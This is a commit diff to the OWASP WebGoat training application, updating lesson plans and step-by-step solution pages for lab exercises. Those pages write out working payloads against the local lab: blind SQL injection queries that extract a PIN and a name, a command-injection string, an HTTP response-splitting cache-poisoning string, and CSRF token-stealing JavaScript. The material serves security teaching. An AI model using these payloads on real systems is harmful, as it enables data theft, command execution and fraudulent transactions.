+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost/WebGoat/catcher?PROPERTY=yes...</UL> "
+ "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);

3
src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
View File

@ -62,8 +62,9 @@ public class DeleteProfile extends DefaultLessonAction
if (isAuthenticated(s))
{
if (userId != employeeId) {
deleteEmployeeProfile(s, userId, employeeId);
}
try
{
chainedAction.handleRequest(s);

2
src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
View File

@ -68,6 +68,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
// This action has not yet been implemented. None of the lessons require it.
registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
// These actions are special in that they chain to other actions.

6
src/main/java/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
View File

@ -149,7 +149,8 @@ public class SQLInjection extends GoatHillsFinancial
}
else if (STAGE2.equals(stage))
{
instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br><br>"
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
+ "Implement a fix to block SQL injection into the fields in question on the Login page. "
+ "Repeat stage 1. Verify that the attack is no longer effective.";
}
@ -161,7 +162,8 @@ public class SQLInjection extends GoatHillsFinancial
}
else if (STAGE4.equals(stage))
{
instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br><br>"
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
+ "Implement a fix to block SQL injection into the relevant parameter. "
+ "Repeat stage 3. Verify that access to Neville's profile is properly blocked.";
}

2
src/main/java/org/owasp/webgoat/lessons/SessionFixation.java
View File

@ -245,7 +245,7 @@ public class SessionFixation extends SequentialLessonAdapter
+ "During the last week we had a few problems with our database. "
+ "We have received many complaints regarding incorrect account details. "
+ "Please use the following link to verify your account "
+ "data:<br><br><center><a href=/WebGoat/"
+ "data:<br><br><center><a href=/webgoat/"
+ link
+ "> Goat Hills Financial</a></center><br><br>"
+ "We are sorry for the any inconvenience and thank you for your cooparation.<br><br>"

2
src/main/java/org/owasp/webgoat/lessons/SqlStringInjection.java
View File

@ -141,7 +141,7 @@ public class SqlStringInjection extends SequentialLessonAdapter
{
ElementContainer ec = new ElementContainer();
ec.addElement(WebGoatI18N.get("StringSqlInjectioNSecondStage"));
ec.addElement(WebGoatI18N.get("StringSqlInjectionSecondStage"));
if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
{
getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");

2
src/main/java/org/owasp/webgoat/lessons/WSDLScanning.java
View File

@ -118,7 +118,7 @@ public class WSDLScanning extends LessonAdapter
hints.add("Try connecting to the WSDL with a browser or Web Service tool.");
hints.add("Sometimes the WSDL will define methods that are not available through a web API. "
+ "Try to find operations that are in the WSDL, but not part of this API");
hints.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
hints.add("The URL for the web service is: http://localhost/webgoat/services/WSDLScanning <br>"
+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
hints.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
return hints;

2
src/main/resources/WebGoatLabels_english.properties
View File

@ -82,7 +82,7 @@ FileTooLarge=File is too large
FileBinary=File is binary
TheFollowingError=The following error occurred while accessing the file: <
PathBasedAccessControlInstr1=The '
PathBasedAccessControlInstr2=' user has access to all the files in the lesson_plans/English directory. Try to break the access control mechanism and access a resource that is not in the listed directory. After selecting a file to view, WebGoat will report if access to the file was granted. An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml
PathBasedAccessControlInstr2=' user has access to all the files in the lesson_plans/English directory. Try to break the access control mechanism and access a resource that is not in the listed directory. After selecting a file to view, WebGoat will report if access to the file was granted. An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml. Remember that file paths will be different if using the WebGoat source.
ErrorGenerating=Error generating
ViewingFile=Viewing file:
File=File:

BIN
src/main/webapp/images/header/header.jpg
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 17 KiB

After

Width:  |  Height:  |  Size: 94 KiB

BIN
src/main/webapp/images/logos/Thumbs.db Normal file
View File

Binary file not shown.

BIN
src/main/webapp/images/logos/seleucus.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.5 KiB

9
src/main/webapp/lesson_plans/English/BufferOverflow.html
View File

@ -1,9 +0,0 @@
<div align="Center">
<p><b>Lesson Plan Title:</b> How to Exploit Buffer Overflows</p>
</div>
<!-- Start Instructions -->
<p><b>Concept / Topic To Teach:</b> </p>
How to Exploit Buffer Overflows.
<p><b>General Goal(s):</b> </p>
This lesson needs a creator!
<!-- Stop Instructions -->

2
src/main/webapp/lesson_plans/English/CSRF.html
View File

@ -21,6 +21,6 @@ In this way, the attacker can make the victim perform actions that they didn't i
</div>
<p><b>General Goal(s):</b> </p>
<!-- Start Instructions -->
Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.
Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.<br/><b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
<!-- Stop Instructions -->

3
src/main/webapp/lesson_plans/English/CsrfPromptByPass.html
View File

@ -27,6 +27,7 @@ parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the sh
left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
receives this email and happens to be authenticated at that time will have his funds transferred.
When you think the attack is successful, refresh the page and you will find the green check on
the left hand side menu.
the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
<!-- Stop Instructions -->

3
src/main/webapp/lesson_plans/English/CsrfTokenByPass.html
View File

@ -31,7 +31,8 @@ request to transfer funds. To successfully complete you need to obtain a valid
The page that presents the transfer funds form contains a valid request token. The URL for the
transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load
this page, read the token and append the token in a forged request to transferFunds. When you think
the attack is successful, refresh the page and you will find the green check on the left hand side menu.
the attack is successful, refresh the page and you will find the green check on the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
<!-- Stop Instructions -->

10
src/main/webapp/lesson_plans/English/HowToWork.html
View File

@ -33,17 +33,11 @@ solution for complete details.</p>
<p>
To read and edit Parameters you need a local proxy to intercept the HTTP request.
Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
After installing WebScarab and configuring your browser to use it as proxy on localhost we can start.<br><br>
<img src="images/introduction/HowToUse_1.jpg"><br><br>
We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
<img src="images/introduction/HowToUse_2.jpg"><br><br>
Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.
</p>
<h2>Read And Edit Cookies</h2>
<p>
Often it is not only necessary to change the value of the parameters but to change the value of cookies.
We can use WebScarab to intercept the request and change cookies values just like parameter data as explained in the last topic.<br><br>
<img src="images/introduction/HowToUse_3.jpg"><br><br>
We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit the values of them.
WebScarab has functionality for this as well.
</p>
<!-- Stop Instructions -->

1
src/main/webapp/lesson_plans/English/HttpSplitting.html
View File

@ -30,5 +30,6 @@ Date: Fri, 30 Dec 2005 17:32:47 GMT</blockquote>
<!-- Start Instructions -->
<p>This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.</p>
<p>Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.</p>
<p>You may find the <a href="http://yehg.net/encoding/">PHP Charset Encoder</a> useful. The Encode and DecodeURIComponent buttons translate CR and LF.</p>
<!-- Stop Instructions -->

21
src/main/webapp/lesson_plans/English/OffByOne.html Normal file
View File

@ -0,0 +1,21 @@
<div align="Center">
<p><b>Lesson Plan Title:</b> How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities</p>
</div>
<p><b>Concept / Topic To Teach:</b></p>
How to Exploit a Web Based "Off-by-One" Buffer Overflow.
<br>
<div align="Left">
<p><b>How the attack works:</b>
</p>
Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language.
For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte.
As a result, further information is returned back to the user, due to the fact that no null byte was found.
</div>
<p><b>Lesson Goal(s):</b> </p>
<!-- Start Instructions -->
<p>Welcome to the <b>OWASP Hotel</b>! Can you find out which room a VIP guest is staying in?</p>
<!-- Stop Instructions -->
* Understand how a buffer overflow vulnerability can be triggered on a web application.<br>
* Understand what type of value lengths are likely to trigger a buffer overflow.<br>

9
src/main/webapp/lesson_plans/English/UsefulTools.html
View File

@ -12,6 +12,15 @@ operates as an intercepting proxy, we can review and modify requests
and responses.<br><br>
<img src="images/introduction/webscarab.jpg"><br><br>
Webpage:<a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project</a>
<br>The .jar install file can be found at the <a href="http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823">OWASP Sourceforge Page</a></p>
<p>After installing WebScarab and configuring your browser to use it as proxy on localhost we can start. If you are using localhost for your Tomcat server, remember to <a href="https://www.owasp.org/index.php/WebScarab_Getting_Started">put a "." after the hostname when browsing to WebGoat</a>.<br><br>
<img src="images/introduction/HowToUse_1.jpg"><br><br>
We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
<img src="images/introduction/HowToUse_2.jpg"><br><br>
Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.<br><br>
WebScarab is also used to intercept the request and change cookies values just like parameter data:<br><br>
<img src="images/introduction/HowToUse_3.jpg"><br><br>
We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit their values.
</p>
<h2>Firebug:</h2>
<p>

1
src/main/webapp/lesson_solutions/BasicAuthentication.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Basic Authentication</title>
<link rel=File-List href="lesson_solutions/BasicAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BasicAuthentication_files/editdata.mso">
<!--[if !mso]>

46
src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html Normal file
View File

@ -0,0 +1,46 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Blind Numeric SQL Injection</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Blind Numeric SQL Injection</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.<br/>
The goal is to find the value of the field pin in table pins for the row with the cc_number of 1111222233334444. The field is of type int, which is an integer.<br/>
Put the discovered pin value in the form to pass the lesson.
</p>
<b>Solution:</b><br/><br/>
In this lesson, the only output returned by the webpage is whether a given account exists or not. Therefore, we cannot simply request the pin number for this account.<br/>
We can take advantage of the query being used, however. The database query being used is:<br/>
SELECT * FROM user_data WHERE userid=<b>accountNumber</b>;<br/><br/>
If this query returns information for the account, the page will indicate the account exists. However, if the userid doesnt exist, no data is returned and the page says the account is invalid.
By using the AND function, we can add additional conditions to this query. If the additional condition is true, the result will be a valid account, if not the page will indicate the account is invalid.<br/>
For example, try entering these two commands for the account ID:<br/>
<b>101 AND 1=1</b> and <b>101 AND 1=2</b><br/><br/>
In the first statement, both conditions return true. Account 101 is found and 1=1, so the page indicates the account is valid.<br/>
In the second statement, only the first condition is true. Account 101 is found but 1 does not equal 2, so the page indicates the account is invalid.<br/><br/>
Now, we can use a more complicated command for our second true/false statement. The following statement will tell us if the pin is above or below 10000:<br/>
<b>101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );</b><br/><br/>
If our command returns false, it makes the entire statement false and returns and invalid account, which indicates the pin number is below 10000. If it is above 10000, the opposite is true.<br/><br/>
The last step is to repeatedly use this command with a different number to the right of the > operator until we can determine the pin number.<br/>
The pin number is <b>2364</b>. Enter this number to complete the lesson.
</body>
</html>

0
src/main/webapp/lesson_solutions/BlindSqlInjection.html → src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
View File

42
src/main/webapp/lesson_solutions/BlindStringSqlInjection.html Normal file
View File

@ -0,0 +1,42 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Blind String SQL Injection</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Blind String SQL Injection</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.<br/>
The goal is to find the value of the field name in table pins for the row with the cc_number of 4321432143214321. The field is of type varchar, which is a string.<br/>
Put the discovered name in the form to pass the lesson. Only the discovered name should be put into the form field, paying close attention to the spelling and capitalization.<br/>
</p>
<b>Solution:</b><br/><br/>
This lesson is conceptually very similar to the previous lesson. The big difference is we are searching for a string, not a number.<br/>
We will attempt to figure out the name the same way, by injecting a boolean expression into the pre-scripted SQL query. It looks similar to the one from the previous lesson:<br/>
<b>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );</b><br/><br/>
We can compare characters the same way we can compare numbers. For example, N > M. However, without the SUBSTRING method, we are attempting to compare the entire string to one letter, which doesn't help us. The substring method has the following syntax:<br/>
<b>SUBSTRING(STRING,START,LENGTH)</b><br/><br/>
The expression above compares the first letter to H. It will return false and show invalid account number. Changing the boolean expression to <b>< 'L'</b> returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is <b>J</b>. Note that capitalization matters, and it's right to assume the first letter is capitalized.<br/><br/>
To determine the second letter, we have to change the SUBSTRING parameters to compare against the second letter. We can use this command:<br/>
<b>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), <u>2</u>, 1) < '<u>h</u>' );</b><br/><br/>
Using several more queries, we can determine the second letter is <b>i</b>. Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters.
The name is <b>Jill</b>. Enter this name to complete the lesson. Capitalization matters.
</body>
</html>

37
src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html Normal file
View File

@ -0,0 +1,37 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Bypass HTML Field Restrictions</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Bypass HTML Field Restrictions</p>
<p><b>Concept / Topic To Teach:</b><br/>
Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application
</p>
<p><b>General Goal(s):</b><br/>
The user should be able send the website input that it wasn't expecting.<br/>
For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting, including input for the disabled field. <b>You must break all 6 validators at the same time</b>.
</p>
<b>Solution:</b><br/><br/>
To solve this lesson, we need to put invalid characters (slashes, quotes, etc.) into all six fields. Since three of the fields are toggles or dropdowns, we will need to intercept the request with Webscarab.<br/>
We still need to put invalid data in the disabled field, however. There are two ways of accomplishing this; we can enable the field using Firebug, or we can insert an additional field using Webscarab.<br/><br/>
To enable the field, open Firebug and find the form containing all of our fields. Find the text input named &quot;disabledinput&quot;. Delete the <b>disabled=&quot;&quot;</b> parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.<br/>
<img src="lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg"><br/>
<font size="2"><b>Enabled input after removing the &quot;disabled&quot; parameter in Firebug.</b></font><br/><br/>
The other option is to add another variable when intercepting the request with Webscarab. When the intercept request window pops up, use the insert button to add a new variable called <b>disabledinput</b>.<br/><br/>
Either way you add the input, the next step is to invalidate all of the responses. Put any symbol or character that isn't allowed in for each variable. Make sure you put more than five characters in the field that is limited by length.<br/>
<img src="lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg"><br/>
<font size="2"><b>Correctly filled in request with all fields invalidated and the disabledinput variable added.</b></font><br/><br/>
Submit the request to complete the lesson.
<br/>
</body>
</html>

BIN
src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 152 KiB

BIN
src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 210 KiB

3
src/main/webapp/lesson_solutions/CSRF.html
View File

@ -690,7 +690,8 @@ a URL. The URL should point to the CSRF lesson with an extra parameter
menu by right clicking on the left hand menu and choosing copy shortcut.
Whoever receives this email and happens to be authenticated at that time will
have his funds transferred. When you think the attack is successful, refresh
the page and you will find the green check on the left hand side menu.<o:p></o:p></span></p>
the page and you will find the green check on the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

10
src/main/webapp/lesson_solutions/ClientSideFiltering.html
View File

@ -68,11 +68,11 @@ filters in XPath. Following code will exactly do this:</p>
<code>
StringBuffer sb = new StringBuffer();<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/LastName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/SSN | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/Salary ");<br>
String expression = sb.toString();<br>
</code>

5
src/main/webapp/lesson_solutions/CommandInjection.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Command Injection</title>
<link rel=File-List href="lesson_solutions/CommandInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/CommandInjection_files/editdata.mso">
<!--[if !mso]>
@ -678,8 +679,8 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p><span style='font-family:"Arial","sans-serif"'>Intercept the
request with WebScarab when you click on "View". Append " &amp; netstat &minus;an
&amp; ipconfig"to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
request with WebScarab when you click on "View". Append <b>" &amp; netstat -an
&amp; ipconfig</b> to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

5
src/main/webapp/lesson_solutions/CsrfPromptByPass.html
View File

@ -16,12 +16,13 @@ multiple requests to by-pass a scriptable user-prompt
<p><b>General Goal(s):</b><br/>
Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
malicious requests: the first to transfer funds, and the second a request to confirm the prompt
that the first request triggered. The URL should point to the CSRF lesson with an extra
that the first request triggered. The URL should point to this lesson with an extra
parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
receives this email and happens to be authenticated at that time will have his funds transferred.
When you think the attack is successful, refresh the page and you will find the green check on
the left hand side menu
the left hand side menu<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
</p>
<b>Solution:</b><br/>

9
src/main/webapp/lesson_solutions/CsrfTokenByPass.html
View File

@ -32,7 +32,8 @@ request to transfer funds. To successfully complete you need to obtain a valid
URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter
"transferFunds=main". Load this page, read the token and append the token in a forged request
to transferFunds. When you think the attack is successful, refresh the page and you will find the
green check on the left hand side menu.
green check on the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
</p>
<b>Solution:</b><br/>
@ -70,7 +71,7 @@ var tokenvalue;
function readFrame1()
{
var frameDoc = document.getElementById("frame1").contentDocument;
var form = frameDoc.getElementsByTagName("Form")[0];
var form = frameDoc.getElementsByTagName("form")[1];
var token = form.CSRFToken.value;
tokenvalue = '&CSRFToken='+token;
@ -80,7 +81,7 @@ function readFrame1()
function loadFrame2()
{
var testFrame = document.getElementById("frame2");
testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
testFrame.src="http://localhost:8080/webgoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
}
</pre></code>
@ -94,7 +95,7 @@ call readFrame1, which calls loadFrame2, which then sets the src for the second
<code>
<pre id="line585">&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://localhost:8080/WebGoat/attack?Screen=212&amp;menu=900&amp;transferFunds=main"
<pre id="line585">&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://localhost:8080/webgoat/attack?Screen=212&amp;menu=900&amp;transferFunds=main"
</span><span class="attribute-name">onload</span>=<span class="attribute-value">"readFrame1();"
</span><span class="attribute-name">id</span>=<span class="attribute-value">"frame1" </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">"1" </span><span class="attribute-name">marginwidth</span>=<span class="attribute-value">"0"
</span><span class="attribute-name">marginheight</span>=<span class="attribute-value">"0" </span><span class="attribute-name">width</span>=<span class="attribute-value">"800" </span><span class="attribute-name">scrolling</span>=<span class="attribute-value">yes </span><span class="attribute-name">height</span>=<span class="attribute-value">"300"</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;

4
src/main/webapp/lesson_solutions/DOMInjection.html
View File

@ -794,7 +794,7 @@ field-end'></span><![endif]--> HTTP Response</p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p></o:p></span></p>
reply and replace the body with document.form.SUBMIT.disabled = false;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -804,7 +804,7 @@ reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p><
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image008fix.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

BIN
src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 105 KiB

BIN
src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db Normal file
View File

Binary file not shown.

BIN
src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db Normal file
View File

Binary file not shown.

1
src/main/webapp/lesson_solutions/HttpBasics.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Http Basics</title>
<link rel=File-List href="lesson_solutions/HttpBasics_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpBasics_files/editdata.mso">
<!--[if !mso]>

3
src/main/webapp/lesson_solutions/HttpSplitting.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Http Splitting and Cache Poisoning </title>
<link rel=File-List href="lesson_solutions/HttpSplitting_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpSplitting_files/editdata.mso">
<!--[if !mso]>
@ -979,7 +980,7 @@ attack.<o:p></o:p></span></p>
poisoning requires manipulating the Last-Modified header. This must be changed
to a date in the future.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
</span><span style='font-family:Wingdings;mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;
mso-symbol-font-family:Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:

1
src/main/webapp/lesson_solutions/JSONInjection.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
